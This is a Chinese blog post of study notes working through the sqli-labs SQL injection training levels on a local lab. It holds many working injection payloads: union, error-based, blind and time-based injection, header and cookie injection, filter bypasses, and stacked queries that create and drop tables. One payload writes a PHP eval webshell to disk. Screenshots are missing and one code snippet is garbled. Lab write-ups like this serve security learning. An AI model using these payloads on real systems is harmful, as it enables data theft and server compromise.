SQL注入之天书学习

最新推荐文章于 2022-10-24 21:22:17 发布
最新推荐文章于 2022-10-24 21:22:17 发布
阅读量1.6k 收藏 21
点赞数 5
分类专栏: 基础漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44866139/article/details/105464613
版权

前言:
sql注入经常遇到,尤其是ctf题,一用就懵逼
得知此事要躬行,之前嫌天书太多了,偷懒只学了一点点
偷懒真是万恶的本源

目录

basic knowledge

1、分类:

基于从服务器接收到的响应(最常用)
▲基于错误的 SQL 注入
▲联合查询的类型
▲堆查询注射
▲SQL 盲注
基于布尔 SQL 盲注
基于时间的 SQL 盲注
基于报错的 SQL 盲注

基于如何处理输入的 SQL 查询(数据类型)
•基于字符串
•数字或整数为基础的

基于程度和顺序的注入(哪里发生了影响)
★一阶注射
★二阶注射
一阶注射是指输入的注射语句对 WEB 直接产生了影响,出现了结果;二阶注入类似存储型 XSS,是指输入提交的语句,无法直接对 WEB 应用程序产生影响,通过其它的辅助间接的对 WEB 产生危害,这样的就被称为是二阶注入.

基于注入点的位置上的
▲通过用户输入的表单域的注射。
▲通过 cookie 注射。
▲通过服务器变量注射。 (基于头部信息的注射)

2、函数

show databases;
在这里插入图片描述
use security;
在这里插入图片描述
show tables;
在这里插入图片描述
desc emails;
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述系统数据库在注入的时候很重要,下面来讨论
use information_schema;
在这里插入图片描述show tables;
在这里插入图片描述desc tables;
在这里插入图片描述在这里插入图片描述一般的注入流程:
猜数据库,和show databases();的结果一样
select schema_name from information_schema.schemata
在这里插入图片描述
猜表名
select table_name from information_schema.tables where table_schema=’xxxxx’
在这里插入图片描述
猜列名
Select column_name from information_schema.columns where table_name=’xxxxx’
在这里插入图片描述系统函数
介绍几个常用函数:

  1. version()——MySQL 版本
  2. user()——数据库用户名
  3. database()——数据库名
  4. @@datadir——数据库路径
  5. @@version_compile_os——操作系统版本

字符串连接函数
6. concat(str1,str2,…)——没有分隔符地连接字符串
7. concat_ws(separator,str1,str2,…)——含有分隔符地连接字符串
8. group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据

3、一般用于尝试的语句

Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23
or 1=1–+
'or 1=1–+
"or 1=1–+
)or 1=1–+
')or 1=1–+
") or 1=1–+
"))or 1=1–+

一般的代码为: i d = id= id=_GET[‘id’];
s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = ′ sql="SELECT * FROM users WHERE id=' sql="SELECTFROMusersWHEREid=id’ LIMIT 0,1";

①Select * from users where id=1 and 1=1;
②Select * from users where id=1 && 1=1;
③Select * from users where id=1 & 1=1;
上述三者有什么区别?①和②是一样的,表达的意思是 id=1 条件和 1=1 条件进行与运算。

③的意思是 id=1 条件与 1 进行&位操作,id=1 被当作 true,与 1 进行 & 运算 结果还是 1, 再进行=操作,1=1,还是 1(ps:&的优先级大于=)
Ps:此处进行的位运算。我们可以将数转换为二进制再进行与、或、非、异或等运算。必要 的时候可以利用该方法进行注入结果。例如将某一字符转换为 ascii 码后,可以分别与 1,2,4,8,16,32.。。。进行与运算,可以得到每一位的值,拼接起来就是 ascii 码值。再从 ascii 值反推回字符。(运用较少)

less-1

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

爆库:
http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata–+
在这里插入图片描述爆 security 数据库的数据表
http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22security%22–+
在这里插入图片描述爆 users 表的列
http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%22users%22–+
在这里插入图片描述在这里插入图片描述
爆数据
http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,username,password%20from%20users%20where%20id=2–+
在这里插入图片描述

Less-2

在这里插入图片描述所以这里的奇数个单引号破坏了查询,导致抛出错误。 因此我们得出的结果是,查询代码使用了整数。
在这里插入图片描述
其余的 payload 与 less1 中一直,只需要将 less1 中的 ‘ 去掉即可。 这里不赘述了。

Less-3

在这里插入图片描述在这里插入图片描述
在这里插入图片描述其余的 payload 与 less1 中一样

Less-4

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
其余的 payload 与 less1 中一样

盲注

盲注分为三类
•基于布尔 SQL 盲注
•基于时间的 SQL 盲注
•基于报错的 SQL 盲注

基于布尔 SQL 盲注

left(database(),1)>’s’ //left()函数
Explain:database()显示数据库名称,left(a,b)从左侧截取 a 的前 b 位

ascii(substr((select table_name information_schema.tables where tables_schema =database() limit 0,1),1,1))=101 --+ //substr()函数,ascii()函数 Explain:substr(a,b,c)从 b 位置开始,截取字符串 a 的 c 长度。Ascii()将某个字符转换 为 ascii 值

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23 //ORD()函数,MID()函数 Explain:mid(a,b,c)从位置 b 开始,截取 a 字符串的 c 位 Ord()函数同 ascii(),将字符转为 ascii 值

IFNULL(expr1,expr2)
如果 expr1 不是 NULL,IFNULL() 返回 expr1,否则它返回 expr2。
在这里插入图片描述
在这里插入图片描述regexp 正则注入
select user() regexp ‘1’;
Explain:正则表达式的用法,user()结果为 root,regexp 为匹配 root 的正则表达式。 第二位可以用 select user() regexp ‘^ro’来进行
在这里插入图片描述
当正确的时候显示结果为 1,不正确的时候显示结果为 0.
在这里插入图片描述
select * from users where id=1 and 1=(if((user() regexp ‘^r’),1,0));
在这里插入图片描述select * from users where id=1 and 1=(user() regexp’^r’);
在这里插入图片描述select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema=‘security’ and table_name regexp ‘^us[a-z]’ limit 0,1);
在这里插入图片描述like 匹配注入
在这里插入图片描述

基于报错的 SQL 盲注

在这里插入图片描述Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;
大致原理为分组后数据计数时 重复造成的错误

以上语句可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
在这里插入图片描述

如果关键的表被禁用了,可以使用这种形式
select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))

如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(passwo rd,@a:=(@a+1)%2)

select exp(~(select * FROM(SELECT USER())a)) //double 数值类 型超出范围
//Exp()为以 e 为底的对数函数;版本在 5.5.5 及其以上
在这里插入图片描述select !(select * from (select user())x) - (ps:这是减号) ~0
//bigint 超出范围;~0 是对 0 逐位取反,很大的版本在 5.5.5 及其以上
在这里插入图片描述extractvalue(1,concat(0x7e,(select @@version),0x7e)) se
//mysql 对 xml 数据进 行查询和修改的 xpath 函数,xpath 语法错误

updatexml(1,concat(0x7e,(select @@version),0x7e),1)
//mysql 对 xml 数据进行 查询和修改的 xpath 函数,xpath 语法错误

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x; //mysql 重复特性,此处重复了 version,所以报错。
在这里插入图片描述

基于时间的 SQL 盲注

If(ascii(substr(database(),1,1))>115,0,sleep(5))
//if 判断语句,条件为假, 执行 sleep

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1; //BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达 式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执 行成功。这是一种边信道攻击,在运行过程中占用大量的 cpu 资源。推荐使用 sleep() 函数进行注入

Less-5

在这里插入图片描述
在这里插入图片描述在这里插入图片描述猜测是盲注

解法一:利用 left(database(),1)进行尝试
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述解法二:利用 substr() ascii()函数进行尝试
在这里插入图片描述在这里插入图片描述
在这里插入图片描述解法三:利用 regexp 获取(2)中 users 表中的列
选择 users 表中的列名是否有 us**的列
在这里插入图片描述在这里插入图片描述解法四:利用 ord()和 mid()函数获取 users 表的内容
在这里插入图片描述解法五:报错注入
?id=1’ union Select 1,count(*),concat(0x3a,0x3a,(select user()),0 x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a–+

在这里插入图片描述利用 double 数值类型超出范围进行报错注入
http://127.0.0.1/sqllib/Less-5/?id=1’ union select (exp(~(select * FROM(SELECT USER())a))),2, 3–+
在这里插入图片描述利用 bigint 溢出进行报错注入
http://127.0.0.1/sqllib/Less-5/?id=1’ union select (!(select * from (select user())x) - ~0),2,3- -+
在这里插入图片描述xpath 函数报错注入
在这里插入图片描述在这里插入图片描述利用数据的重复性
http://127.0.0.1/sqllib/Less-5/?id=1’union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+
在这里插入图片描述解法六:延时注入
在这里插入图片描述利用 BENCHMARK()进行延时注入
http://127.0.0.1/sqllib/Less-5/?id=1’UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BEN CHMARK(50000000,ENCODE(‘MSG’,‘by 5 seconds’)),null)),2,3 FROM (select database() as current) as tb1–+
在这里插入图片描述

Less-6

在这里插入图片描述那我们在这一关的策略和 less5 的是一样的。只需要将 ‘ 替换成 “ .
在这里插入图片描述

导入导出相关操作

Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述LOAD DATA INFILE 语句用于高速地从一个文本文件中读取行,并装入一个表中。文件名称必 须为一个文字字符串。

load data infile ‘/tmp/t0.txt’ ignore into table t0 character set gbk fields terminated by ‘\t’ lines terminated by ‘\n’

将/tmp/t0.txt 导入到 t0 表中,character set gbk 是字符集设置为 gbk,fields terminated by 是 每一项数据之间的分隔符,lines terminated by 是行的结尾符。

当错误代码是 2 的时候的时候,文件不存在,错误代码为 13 的时候是没有权限,可以考虑 /tmp 等文件夹。

TIPS:我们从 mysql5.7 的文档看到添加了 load xml 函数,是否依旧能够用来做注入还需要验 证。

Less-7

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
利用上述提到的文件导入的方式进行演示:

FILE权限指的是对服务器主机上文件的访问,数据库用户拥有FILE权限才可以执行select into outfile,load data infile操作,但是我一直试不成功。

http://127.0.0.1/sqllib/Less-7/?id=1’))UNION SELECT 1,2,3 into outfile “c:\wamp\www\sqlli b\Less-7\uuu.txt”%23

http://127.0.0.1/sqllib/Less-7/?id=1’))UNION SELECT 1,2,’<?php @eval($_post[“mima”])?>’ i nto outfile “c:\wamp\www\sqllib\Less-7\yijuhua.php”–+

Less-8

在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-9

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述
在这里插入图片描述http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20if(ascii(database(),1,1)=115,1,sleep(5))–+

http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20limit%200,1),1,1))=101,sleep(5),1)–+

http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),1,1))=105,sleep(5),1)–+

http://localhost/sqli-labs-master/Less-9/?id=1%27%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))=68,sleep(5),1)–+

Less-10

和 less9 的区别就在于单引号(‘)变成了(“),请参考 less-9

Less-11

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-12

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述admin’)and left(database(),1)>‘a’#
在这里插入图片描述

Less-14

在这里插入图片描述admin" and left(database(),1)>‘a’#
在这里插入图片描述admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#
在这里插入图片描述

Less-15

在这里插入图片描述admin’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)#

Less-16

admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#

Less-17

在这里插入图片描述uname=admin&passwd=11’and extractvalue(1,concat(0x7e,(select @@version),0x7e))#
在这里插入图片描述11’and If(ascii(substr(database(),1,1))=115,1,sleep(5))#

默认地,PHP 对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。所以您 不应对已转义过的字符串使用 addslashes(),因为这样会导致双层转义。遇到这种情况时可 以使用函数 get_magic_quotes_gpc() 进行检测。

stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。

在我们 less17 的 check_input()中,对 username 进行各种转义的处理,所以此处不能使用 username 进行注入。

Less-18

在这里插入图片描述
在这里插入图片描述修改user-agent
将 user-agent 修改为’and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and ‘1’='1

修改 user-agent 后在前台显示 user-agent 已经为修改后的了。
在这里插入图片描述

Less-19

在这里插入图片描述将 referer 修改为’and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and ‘1’='1

Less-20

cookie 从 username 中获得值后,当再次刷新时,会从 cookie 中读 取 username,然后进行查询。 登录成功后,我们修改 cookie,再次刷新时,这时候 sql 语句就会被修改了。

Less-23

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述id=1’or extractvalue(1,concat(0x7e,database())) or ‘1’='1
在这里插入图片描述-1’union select 1,(select group_concat(schema_name) from information_schema.schemata),‘3
在这里插入图片描述-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),‘3
在这里插入图片描述-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),‘3
在这里插入图片描述?id=-1’ union select 1,(select group_concat(username) from security.users ),'3
在这里插入图片描述

Less-24

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-25

在这里插入图片描述如何绕过 or 和 and 过滤。一般性提供以下几种思路:
(1)大小写变形 Or,OR,oR
(2)编码,hex,urlencode
(3)添加注释/or/
(4)利用符号 and=&& or=||

在这里插入图片描述在这里插入图片描述

Less-25a

在这里插入图片描述
在这里插入图片描述

Less-26

在这里插入图片描述在这里插入图片描述在linux下可以成功利用

对于注释和结尾字符的我们此处只能利用构造一个 ’ 来闭合后面到 ’ ;
对于空格,有较多的方法:
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格

Less-26a

在这里插入图片描述?id=100‘)union%a0select%a01,2,3||(’1
?id=100’)union%a0select%a01,user(),(‘3

Less-27

在这里插入图片描述?id=100’unIon%a0SelEcT%a01,database(),3||'1

Less-27a

?id=100"%a0UnIon%a0SElecT%a01,user(),"3

Less-28

在这里插入图片描述/?id=100’)union%a0select(1),(user()),(3)||('1

Less-28a

在这里插入图片描述

Less-29

在这里插入图片描述

Less-30

在这里插入图片描述在这里插入图片描述

Less-31

在这里插入图片描述在这里插入图片描述

Less-32

在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-33

在这里插入图片描述在这里插入图片描述

Less-34

在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-35

在这里插入图片描述在这里插入图片描述

Less-36

在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-37

在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-38

在这里插入图片描述

Less-39

在这里插入图片描述在这里插入图片描述

Less-40

在这里插入图片描述

Less-41

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

Less-42

在这里插入图片描述c’;create table me like users#
在这里插入图片描述
c’;drop table me#
在这里插入图片描述

Less-43

username:admin
Password:c’);create table less43 like users#

Less-44

Password:a’;insert into users(id,username,password) values (‘144’,‘less44’,‘hello’)#
在这里插入图片描述

Less-45

Password:c’);create table less45 like users#

Less-46

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-47

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less-48

在这里插入图片描述在这里插入图片描述

Less-49

?sort=1’ and (If(ascii(substr((select username from users where id=1),1,1))=69,0,sleep(5)))–+

Less-50

在这里插入图片描述

在这里插入图片描述

Less-51

?sort=1%27;create%20table%20less51%20like%20us ers–+

Less-52

?sort=1;create%20table%20less52%20like%20users

Less-53

?sort=1%27;create%20table%20less53%20like%20us ers–+

Less-54

在这里插入图片描述在这里插入图片描述在这里插入图片描述

Less55-Less57

和Less54差不多,这里就不演示了

Less-58

在这里插入图片描述

Less-59

http://127.0.0.1/sqli-labs-master/Less-59/?id=-1 union select extractvalue(1,concat(0x7e,(select group _concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x7e))–+

Less-60

在这里插入图片描述

?id=-1")union select extractvalue(1,concat(0x7e,(select grou p_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x 7e))–+

Less-61

?id=-1’))union select extractvalue(1,concat(0x7e,(select grou p_concat(table_name) from information_schema.tables where table_schema=‘challenges’),0x 7e))–+

在这里插入图片描述

在这里插入图片描述

Less-62

在这里插入图片描述http://127.0.0.1/sqli-labs/Less-62/?id=1%27)and%20If(ascii(substr((select%20group_concat(tabl e_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%2 7),1,1))=79,0,sleep(10))–+

Less-63

http://127.0.0.1/sqli-labs/Less-63/?id=1%27and%20If(ascii(substr((select%20group_concat(table _name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27) ,1,1))=77,0,sleep(10))–+

Less-64

http://127.0.0.1/sqli-labs/Less-64/?id=1))and%20If(ascii(substr((select%20group_concat(table_n ame)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27), 1,1))=79,0,sleep(10))–+

Less-65

http://127.0.0.1/sqli-labs/Less-65/?id=1%22)and%20If(ascii(substr((select%20group_concat(tabl e_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%2 7),1,1))=79,0,sleep(10))–+

  1. a-z ↩︎

一只小白来了
关注
  • 5
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 注入天书.pdf
08-06
SQL 注入学习天书
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1117
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
mysql盲注天书_MYSQL注入天书之盲注讲解
weixin_33456137的博客
02-28 100
Background-2 盲注的讲解何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从background-1中,我们可以知道盲注分为三类?基于布尔SQL盲注?基于时间的SQL盲注?基于报错的SQL盲注Ps:知识点太多了,这里只能简单列出来大致讲解一下。(ps:每当看到前辈的奇淫技巧的pa...
SQL注入天书(SQLi-LABS)搭建
网络猿的博客
01-11 2073
SQL注入天书(SQLi-LABS)搭建: 安装SQLi-LABS需要准备相应的环境,推荐使用phpstudy软件,搭建也很快。 SQLi-LABS下载地址:https://download.csdn.net/download/qq_36451824/14120011 phpstudy下载地址:https://www.xp.cn/wenda/407.html 下载phpstudy2016版本,因为SQLi-LABS太老了,phpstudy新版本不支持的。 1、将下载后的SQLi-LABS解压收放到phpst
sql-lib注入天书-Less-1
weixin_43803070的博客
05-06 3773
1.尝试报错我们在1之后加上‘,根据反馈信息1’后面多了一个‘所以我们想办法闭合用 'or 1=1 --+。 2.接下来我们进行Order by 对前面的数据进行排序(http://192.168.83.129/sqli-labs-master/Less-1/?id=1’ order by 3 --+),我们用order by 3 --+发现数据回显正常,但是我们发现用order by 4 --...
SQL注入:MySQL注入天书(1-4) Error Based
无名J0kзr的博客
01-29 1234
文章目录注入流程 注入流程 输入一个参数id,返回两个参数,说明SELECT的至少有username和password两个字段,存放这两个字段的表至少有三个字段id, username, password 单引号判断在id处有注入点 使用ORDER BY判断出表中有3个字段 使用UNION确定到底SELECT了几个字段 首先用一个非法的id值-1,这样根据id选出来的字段值为空,可显示出...
SQL注入天书笔记(1)布尔盲注
m0_55400802的博客
10-24 1457
🍀作者简介:被吉师散养、喜欢前端、学过后端、练过CTF、玩过DOS、不喜欢java的不知名学生。被吉师散养的职业混子🫒每日emo:怀揣着。。CTF专栏。
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sql注入天书
qq_36030342的博客
09-21 342
引言 随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的 SQL Injection,即SQL注入。    SQL注入
SQL注入天书
10-24
随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。...用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的 SQL Injection,即SQL注入。
SQL注入天书SQL注入天书
04-06
SQL注入天书SQL注入天书SQL注入天书SQL注入天书SQL注入天书SQL注入天书SQL注入天书
SQL注入天书 下载完整版
04-24
这个才是SQL注入天书完整版,不像其他CSDN中的个别骗人的,拿了个只有部分的传上来。
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
修改sql-connections/db-creds.inc文件当中的mysql账号密码进行安装数据库的创建 介绍几个函数:  (1)version():查看数据库版本  (2)user():查看当前用户  (3)database():查看使用的数据库  (4...
sql注入天书 注入漏洞全攻略
07-18
SQL注入漏洞全接触 SQL注入漏洞全教程 SQL注入漏洞全攻略
关于SQL注入学习方式
最新发布
05-26
学习SQL注入可以从以下几个方面入手: 1. 学习基础的SQL语法和数据库知识,了解常见的数据库类型、表、列、数据类型等概念。 2. 了解SQL注入的原理和分类,包括手动注入和自动化工具注入,以及盲注、联合查询注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值